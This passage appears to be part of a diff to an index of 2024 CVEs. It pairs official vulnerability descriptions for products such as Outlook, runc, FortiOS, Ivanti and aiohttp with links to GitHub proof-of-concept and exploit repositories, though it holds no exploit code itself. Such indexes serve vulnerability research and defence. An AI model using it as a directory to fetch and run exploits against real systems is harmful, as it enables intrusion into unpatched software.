+A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker with Administrator-level privileges to perform command injection attacks on an affected system and elevate their privileges to root. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to elevate their privileges to root.
+
+
+- [nettitude/CVE-2024-20356](https://github.com/nettitude/CVE-2024-20356)
+- [SherllyNeo/CVE_2024_20356](https://github.com/SherllyNeo/CVE_2024_20356)
+
+### CVE-2024-20404 (2024-06-05)
+
+A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system.\r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device.
+
+
+- [AbdElRahmanEzzat1995/CVE-2024-20404](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404)
+
+### CVE-2024-20405 (2024-06-05)
+
+A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. \r\n\r This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device.
+
+
+- [AbdElRahmanEzzat1995/CVE-2024-20405](https://github.com/AbdElRahmanEzzat1995/CVE-2024-20405)
+
+### CVE-2024-20656 (2024-01-09)
+
+Visual Studio Elevation of Privilege Vulnerability
+
+
+- [Wh04m1001/CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656)
+
+### CVE-2024-20666 (2024-01-09)
+
+BitLocker Security Feature Bypass Vulnerability
+
+
+- [nnotwen/Script-For-CVE-2024-20666](https://github.com/nnotwen/Script-For-CVE-2024-20666)
+
+### CVE-2024-20696 (2024-01-09)
+
+Windows libarchive Remote Code Execution Vulnerability
+
+
+- [clearbluejar/CVE-2024-20696](https://github.com/clearbluejar/CVE-2024-20696)
+
+### CVE-2024-20698 (2024-01-09)
+
+Windows Kernel Elevation of Privilege Vulnerability
+
+
+- [RomanRybachek/CVE-2024-20698](https://github.com/RomanRybachek/CVE-2024-20698)
+
+### CVE-2024-20767 (2024-03-18)
+
+ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
+
+
+- [yoryio/CVE-2024-20767](https://github.com/yoryio/CVE-2024-20767)
+- [m-cetin/CVE-2024-20767](https://github.com/m-cetin/CVE-2024-20767)
+- [Chocapikk/CVE-2024-20767](https://github.com/Chocapikk/CVE-2024-20767)
+- [Praison001/CVE-2024-20767-Adobe-ColdFusion](https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion)
+
+### CVE-2024-20931 (2024-02-17)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
+
+
+- [GlassyAmadeus/CVE-2024-20931](https://github.com/GlassyAmadeus/CVE-2024-20931)
+- [Leocodefocus/CVE-2024-20931-Poc](https://github.com/Leocodefocus/CVE-2024-20931-Poc)
+- [ATonysan/CVE-2024-20931_weblogic](https://github.com/ATonysan/CVE-2024-20931_weblogic)
+- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931)
+
+### CVE-2024-21006 (2024-04-16)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
+
+
+- [momika233/CVE-2024-21006](https://github.com/momika233/CVE-2024-21006)
+
+### CVE-2024-21107 (2024-04-16)
+
+Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 6.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [Alaatk/CVE-2024-21107](https://github.com/Alaatk/CVE-2024-21107)
+
+### CVE-2024-21111 (2024-04-16)
+
+Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.16. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows hosts only. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [mansk1es/CVE-2024-21111](https://github.com/mansk1es/CVE-2024-21111)
+- [10cks/CVE-2024-21111-del](https://github.com/10cks/CVE-2024-21111-del)
+- [x0rsys/CVE-2024-21111](https://github.com/x0rsys/CVE-2024-21111)
+
+### CVE-2024-21305 (2024-01-09)
+
+Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability
+
+
+- [tandasat/CVE-2024-21305](https://github.com/tandasat/CVE-2024-21305)
+
+### CVE-2024-21306 (2024-01-09)
+
+Microsoft Bluetooth Driver Spoofing Vulnerability
+
+
+- [d4rks1d33/C-PoC-for-CVE-2024-21306](https://github.com/d4rks1d33/C-PoC-for-CVE-2024-21306)
+- [PhucHauDeveloper/BadBlue](https://github.com/PhucHauDeveloper/BadBlue)
+
+### CVE-2024-21338 (2024-02-13)
+
+Windows Kernel Elevation of Privilege Vulnerability
+
+
+- [hakaioffsec/CVE-2024-21338](https://github.com/hakaioffsec/CVE-2024-21338)
+- [UMU618/CVE-2024-21338](https://github.com/UMU618/CVE-2024-21338)
+- [varwara/CVE-2024-21338](https://github.com/varwara/CVE-2024-21338)
+- [Zombie-Kaiser/CVE-2024-21338-x64-build-](https://github.com/Zombie-Kaiser/CVE-2024-21338-x64-build-)
+- [tykawaii98/CVE-2024-21338_PoC](https://github.com/tykawaii98/CVE-2024-21338_PoC)
+
+### CVE-2024-21345 (2024-02-13)
+
+Windows Kernel Elevation of Privilege Vulnerability
+
+
+- [exploits-forsale/CVE-2024-21345](https://github.com/exploits-forsale/CVE-2024-21345)
+- [FoxyProxys/CVE-2024-21345](https://github.com/FoxyProxys/CVE-2024-21345)
+
+### CVE-2024-21378 (2024-02-13)
+
+Microsoft Outlook Remote Code Execution Vulnerability
+
+
+- [d0rb/CVE-2024-21378](https://github.com/d0rb/CVE-2024-21378)
+
+### CVE-2024-21388 (2024-01-30)
+
+Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability
+
+
+- [d0rb/CVE-2024-21388](https://github.com/d0rb/CVE-2024-21388)
+
+### CVE-2024-21412 (2024-02-13)
+
+Internet Shortcut Files Security Feature Bypass Vulnerability
+
+
+- [lsr00ter/CVE-2024-21412_Water-Hydra](https://github.com/lsr00ter/CVE-2024-21412_Water-Hydra)
+
+### CVE-2024-21413 (2024-02-13)
+
+Microsoft Outlook Remote Code Execution Vulnerability
+
+
+- [duy-31/CVE-2024-21413](https://github.com/duy-31/CVE-2024-21413)
+- [xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
+- [r00tb1t/CVE-2024-21413-POC](https://github.com/r00tb1t/CVE-2024-21413-POC)
+- [CMNatic/CVE-2024-21413](https://github.com/CMNatic/CVE-2024-21413)
+- [MSeymenD/CVE-2024-21413](https://github.com/MSeymenD/CVE-2024-21413)
+- [Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
+- [ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability](https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability)
+- [DevAkabari/CVE-2024-21413](https://github.com/DevAkabari/CVE-2024-21413)
+- [dshabani96/CVE-2024-21413](https://github.com/dshabani96/CVE-2024-21413)
+- [X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit](https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit)
+- [th3Hellion/CVE-2024-21413](https://github.com/th3Hellion/CVE-2024-21413)
+- [ShubhamKanhere307/CVE-2024-21413](https://github.com/ShubhamKanhere307/CVE-2024-21413)
+
+### CVE-2024-21514 (2024-06-22)
+
+This affects versions of the package opencart/opencart from 0.0.0. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.
+
+
+- [bigb0x/CVE-2024-21514](https://github.com/bigb0x/CVE-2024-21514)
+
+### CVE-2024-21626 (2024-01-31)
+
+runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem ("attack 2"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run ("attack 1"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes ("attack 3a" and "attack 3b"). runc 1.1.12 includes patches for this issue.
+
+
+- [zpxlz/CVE-2024-21626-POC](https://github.com/zpxlz/CVE-2024-21626-POC)
+- [NitroCao/CVE-2024-21626](https://github.com/NitroCao/CVE-2024-21626)
+- [Wall1e/CVE-2024-21626-POC](https://github.com/Wall1e/CVE-2024-21626-POC)
+- [cdxiaodong/CVE-2024-21626](https://github.com/cdxiaodong/CVE-2024-21626)
+- [zhangguanzhang/CVE-2024-21626](https://github.com/zhangguanzhang/CVE-2024-21626)
+- [laysakura/CVE-2024-21626-demo](https://github.com/laysakura/CVE-2024-21626-demo)
+- [V0WKeep3r/CVE-2024-21626-runcPOC](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC)
+- [abian2/CVE-2024-21626](https://github.com/abian2/CVE-2024-21626)
+- [Sk3pper/CVE-2024-21626](https://github.com/Sk3pper/CVE-2024-21626)
+- [KubernetesBachelor/CVE-2024-21626](https://github.com/KubernetesBachelor/CVE-2024-21626)
+- [dorser/cve-2024-21626](https://github.com/dorser/cve-2024-21626)
+
+### CVE-2024-21633 (2024-01-03)
+
+Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files' output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either user name is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue.
+
+
+- [0x33c0unt/CVE-2024-21633](https://github.com/0x33c0unt/CVE-2024-21633)
+
+### CVE-2024-21644 (2024-01-08)
+
+pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.
+
+
+- [ltranquility/CVE-2024-21644-Poc](https://github.com/ltranquility/CVE-2024-21644-Poc)
+
+### CVE-2024-21683 (2024-05-21)
+
+This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server.\n\nThis RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. \n\nAtlassian recommends that Confluence Data Center and Server customers upgrade to latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html\n\nYou can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives.\n\nThis vulnerability was found internally.
+
+
+- [r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/r00t7oo2jm/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server)
+- [W01fh4cker/CVE-2024-21683-RCE](https://github.com/W01fh4cker/CVE-2024-21683-RCE)
+- [absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server](https://github.com/absholi7ly/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server)
+- [phucrio/CVE-2024-21683-RCE](https://github.com/phucrio/CVE-2024-21683-RCE)
+- [xh4vm/CVE-2024-21683](https://github.com/xh4vm/CVE-2024-21683)
+
+### CVE-2024-21762 (2024-02-09)
+
+A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.6, 7.0.0 through 7.0.13, 6.4.0 through 6.4.14, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiProxy versions 7.4.0 through 7.4.2, 7.2.0 through 7.2.8, 7.0.0 through 7.0.14, 2.0.0 through 2.0.13, 1.2.0 through 1.2.13, 1.1.0 through 1.1.6, 1.0.0 through 1.0.7 allows attacker to execute unauthorized code or commands via specifically crafted requests
+
+
+- [BishopFox/cve-2024-21762-check](https://github.com/BishopFox/cve-2024-21762-check)
+- [cleverg0d/CVE-2024-21762-Checker](https://github.com/cleverg0d/CVE-2024-21762-Checker)
+- [h4x0r-dz/CVE-2024-21762](https://github.com/h4x0r-dz/CVE-2024-21762)
+- [r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check](https://github.com/r4p3c4/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check)
+- [d0rb/CVE-2024-21762](https://github.com/d0rb/CVE-2024-21762)
+- [lolminerxmrig/multicheck_CVE-2024-21762](https://github.com/lolminerxmrig/multicheck_CVE-2024-21762)
+- [rdoix/cve-2024-21762-checker](https://github.com/rdoix/cve-2024-21762-checker)
+
+### CVE-2024-21793 (2024-05-08)
+
+\nAn OData injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
+
+
+- [FeatherStark/CVE-2024-21793](https://github.com/FeatherStark/CVE-2024-21793)
+
+### CVE-2024-21887 (2024-01-12)
+
+A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
+
+
+- [oways/ivanti-CVE-2024-21887](https://github.com/oways/ivanti-CVE-2024-21887)
+- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887)
+- [Chocapikk/CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21887)
+- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887)
+- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan)
+- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped)
+- [tucommenceapousser/CVE-2024-21887](https://github.com/tucommenceapousser/CVE-2024-21887)
+- [imhunterand/CVE-2024-21887](https://github.com/imhunterand/CVE-2024-21887)
+
+### CVE-2024-21893 (2024-01-31)
+
+A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
+
+
+- [h4x0r-dz/CVE-2024-21893.py](https://github.com/h4x0r-dz/CVE-2024-21893.py)
+- [Chocapikk/CVE-2024-21893-to-CVE-2024-21887](https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887)
+
+### CVE-2024-22002 (2024-06-18)
+
+CORSAIR iCUE 5.9.105 with iCUE Murals on Windows allows unprivileged users to insert DLL files in the cuepkg-1.2.6 subdirectory of the installation directory.
+
+
+- [0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002](https://github.com/0xkickit/iCUE_DllHijack_LPE-CVE-2024-22002)
+
+### CVE-2024-22024 (2024-02-13)
+
+An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
+
+
+- [0dteam/CVE-2024-22024](https://github.com/0dteam/CVE-2024-22024)
+
+### CVE-2024-22026 (2024-05-22)
+
+A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance.
+
+
+- [securekomodo/CVE-2024-22026](https://github.com/securekomodo/CVE-2024-22026)
+
+### CVE-2024-22120 (2024-05-17)
+
+Zabbix server can perform command execution for configured scripts. After command is executed, audit entry is added to "Audit Log". Due to "clientip" field is not sanitized, it is possible to injection SQL into "clientip" and exploit time based blind SQL injection.
+
+
+- [W01fh4cker/CVE-2024-22120-RCE](https://github.com/W01fh4cker/CVE-2024-22120-RCE)
+
+### CVE-2024-22145 (2024-05-17)
+
+Improper Privilege Management vulnerability in InstaWP Team InstaWP Connect allows Privilege Escalation.This issue affects InstaWP Connect: from n/a through 0.1.0.8.
+
+
+- [RandomRobbieBF/CVE-2024-22145](https://github.com/RandomRobbieBF/CVE-2024-22145)
+
+### CVE-2024-22243 (2024-02-23)
+
+Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.\n
+
+
+- [SeanPesce/CVE-2024-22243](https://github.com/SeanPesce/CVE-2024-22243)
+- [shellfeel/CVE-2024-22243-CVE-2024-22234](https://github.com/shellfeel/CVE-2024-22243-CVE-2024-22234)
+
+### CVE-2024-22369 (2024-02-20)
+
+Deserialization of Untrusted Data vulnerability in Apache Camel SQL ComponentThis issue affects Apache Camel: from 3.0.0 before 3.21.4, from 3.22.0 before 3.22.1, from 4.0.0 before 4.0.4, from 4.1.0 before 4.4.0.\n\nUsers are recommended to upgrade to version 4.4.0, which fixes the issue. If users are on the 4.0.x LTS releases stream, then they are suggested to upgrade to 4.0.4. If users are on 3.x, they are suggested to move to 3.21.4 or 3.22.1\n\n
+
+
+- [oscerd/CVE-2024-22369](https://github.com/oscerd/CVE-2024-22369)
+
+### CVE-2024-22393 (2024-02-22)
+
+Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1.\n\nPixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content.\nUsers are recommended to upgrade to version [1.2.5], which fixes the issue.\n\n
+
+
+- [omranisecurity/CVE-2024-22393](https://github.com/omranisecurity/CVE-2024-22393)
+
+### CVE-2024-22411 (2024-01-16)
+
+Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade.
+
+
+- [tamaloa/avo-CVE-2024-22411](https://github.com/tamaloa/avo-CVE-2024-22411)
+
+### CVE-2024-22416 (2024-01-17)
+
+pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.
+
+
+- [mindstorm38/ensimag-secu3a-cve-2024-22416](https://github.com/mindstorm38/ensimag-secu3a-cve-2024-22416)
+
+### CVE-2024-22514 (2024-02-06)
+
+An issue discovered in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to run arbitrary files by restoring a crafted backup file.
+
+
+- [Orange-418/CVE-2024-22514-Remote-Code-Execution](https://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution)
+
+### CVE-2024-22515 (2024-02-06)
+
+Unrestricted File Upload vulnerability in iSpyConnect.com Agent DVR 5.1.6.0 allows attackers to upload arbitrary files via the upload audio component.
+
+
+- [Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution](https://github.com/Orange-418/AgentDVR-5.1.6.0-File-Upload-and-Remote-Code-Execution)
+- [Orange-418/CVE-2024-22515-File-Upload-Vulnerability](https://github.com/Orange-418/CVE-2024-22515-File-Upload-Vulnerability)
+
+### CVE-2024-22532 (2024-02-28)
+
+Buffer Overflow vulnerability in XNSoft NConvert 7.163 (for Windows x86) allows attackers to cause a denial of service via crafted xwd file.
+
+
+- [pwndorei/CVE-2024-22532](https://github.com/pwndorei/CVE-2024-22532)
+
+### CVE-2024-22534
+- [austino2000/CVE-2024-22534](https://github.com/austino2000/CVE-2024-22534)
+
+### CVE-2024-22640 (2024-04-19)
+
+TCPDF version <=6.6.5 is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted HTML page with a crafted color.
+
+
+- [zunak/CVE-2024-22640](https://github.com/zunak/CVE-2024-22640)
+
+### CVE-2024-22641 (-)
+
+TCPDF version 6.6.5 and before is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing an untrusted SVG file.
+
+
+- [zunak/CVE-2024-22641](https://github.com/zunak/CVE-2024-22641)
+
+### CVE-2024-22752 (2024-03-07)
+
+Insecure permissions issue in EaseUS MobiMover 6.0.5 Build 21620 allows attackers to gain escalated privileges via use of crafted executable launched from the application installation directory.
+
+
+- [hacker625/CVE-2024-22752](https://github.com/hacker625/CVE-2024-22752)
+
+### CVE-2024-22774 (-)
+
+An issue in Panoramic Corporation Digital Imaging Software v.9.1.2.7600 allows a local attacker to escalate privileges via the ccsservice.exe component.
+
+
+- [Gray-0men/CVE-2024-22774](https://github.com/Gray-0men/CVE-2024-22774)
+
+### CVE-2024-22867
+- [brandon-t-elliott/CVE-2024-22867](https://github.com/brandon-t-elliott/CVE-2024-22867)
+
+### CVE-2024-22889 (2024-03-05)
+
+Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request.
+
+
+- [shenhav12/CVE-2024-22889-Plone-v6.0.9](https://github.com/shenhav12/CVE-2024-22889-Plone-v6.0.9)
+
+### CVE-2024-22890
+- [BurakSevben/CVE-2024-22890](https://github.com/BurakSevben/CVE-2024-22890)
+
+### CVE-2024-22894 (2024-01-30)
+
+An issue fixed in AIT-Deutschland Alpha Innotec Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later and Novelan Heatpumps V2.88.3 or later, V3.89.0 or later, V4.81.3 or later, allows remote attackers to execute arbitrary code via the password component in the shadow file.
+
+
+- [Jaarden/CVE-2024-22894](https://github.com/Jaarden/CVE-2024-22894)
+
+### CVE-2024-22899 (2024-02-02)
+
+Vinchin Backup & Recovery v7.2 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the syncNtpTime function.
+
+
+- [Chocapikk/CVE-2024-22899-to-22903-ExploitChain](https://github.com/Chocapikk/CVE-2024-22899-to-22903-ExploitChain)
+
+### CVE-2024-22909
+- [BurakSevben/CVE-2024-22909](https://github.com/BurakSevben/CVE-2024-22909)
+
+### CVE-2024-22922 (2024-01-25)
+
+An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php
+
+
+- [keru6k/CVE-2024-22922](https://github.com/keru6k/CVE-2024-22922)
+
+### CVE-2024-22939 (2024-02-01)
+
+Cross Site Request Forgery vulnerability in FlyCms v.1.0 allows a remote attacker to execute arbitrary code via the system/article/category_edit component.
+
+
+- [NUDTTAN91/CVE-2024-22939](https://github.com/NUDTTAN91/CVE-2024-22939)
+
+### CVE-2024-22983 (2024-02-28)
+
+SQL injection vulnerability in Projectworlds Visitor Management System in PHP v.1.0 allows a remote attacker to escalate privileges via the name parameter in the myform.php endpoint.
+
+
+- [keru6k/CVE-2024-22983](https://github.com/keru6k/CVE-2024-22983)
+
+### CVE-2024-23108 (2024-02-05)
+
+An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 7.1.0 through 7.1.1 and 7.0.0 through 7.0.2 and 6.7.0 through 6.7.8 and 6.6.0 through 6.6.3 and 6.5.0 through 6.5.2 and 6.4.0 through 6.4.2 allows attacker to execute unauthorized code or commands via via crafted API requests.
+
+
+- [horizon3ai/CVE-2024-23108](https://github.com/horizon3ai/CVE-2024-23108)
+- [hitem/CVE-2024-23108](https://github.com/hitem/CVE-2024-23108)
+
+### CVE-2024-23208 (2024-01-23)
+
+The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to execute arbitrary code with kernel privileges.
+
+
+- [hrtowii/CVE-2024-23208-test](https://github.com/hrtowii/CVE-2024-23208-test)
+
+### CVE-2024-23334 (2024-01-29)
+
+aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.
+
+
+- [ox1111/CVE-2024-23334](https://github.com/ox1111/CVE-2024-23334)
+- [sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream](https://github.com/sxyrxyy/aiohttp-exploit-CVE-2024-23334-certstream)
+- [z3rObyte/CVE-2024-23334-PoC](https://github.com/z3rObyte/CVE-2024-23334-PoC)
+- [jhonnybonny/CVE-2024-23334](https://github.com/jhonnybonny/CVE-2024-23334)
+- [brian-edgar-re/poc-cve-2024-23334](https://github.com/brian-edgar-re/poc-cve-2024-23334)
+- [binaryninja/CVE-2024-23334](https://github.com/binaryninja/CVE-2024-23334)
+
+### CVE-2024-23652 (2024-01-31)
+
+BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature.
+
+
+- [abian2/CVE-2024-23652](https://github.com/abian2/CVE-2024-23652)
+
+### CVE-2024-23692 (2024-05-31)
+
+Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
+
+
+- [k3lpi3b4nsh33/CVE-2024-23692](https://github.com/k3lpi3b4nsh33/CVE-2024-23692)
+- [jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS](https://github.com/jakabakos/CVE-2024-23692-RCE-in-Rejetto-HFS)
+- [vanboomqi/CVE-2024-23692](https://github.com/vanboomqi/CVE-2024-23692)
+- [WanLiChangChengWanLiChang/CVE-2024-23692-RCE](https://github.com/WanLiChangChengWanLiChang/CVE-2024-23692-RCE)
+- [Mr-r00t11/CVE-2024-23692](https://github.com/Mr-r00t11/CVE-2024-23692)
+- [Tupler/CVE-2024-23692-exp](https://github.com/Tupler/CVE-2024-23692-exp)
+- [BBD-YZZ/CVE-2024-23692](https://github.com/BBD-YZZ/CVE-2024-23692)
+- [0x20c/CVE-2024-23692-EXP](https://github.com/0x20c/CVE-2024-23692-EXP)
+
+### CVE-2024-23722 (2024-03-26)
+
+In Fluent Bit 2.1.8 through 2.2.1, a NULL pointer dereference can be caused via an invalid HTTP payload with the content type of x-www-form-urlencoded. It crashes and does not restart. This could result in logs not being delivered properly.
+
+
+- [alexcote1/CVE-2024-23722-poc](https://github.com/alexcote1/CVE-2024-23722-poc)
+
+### CVE-2024-23727 (2024-03-28)
+
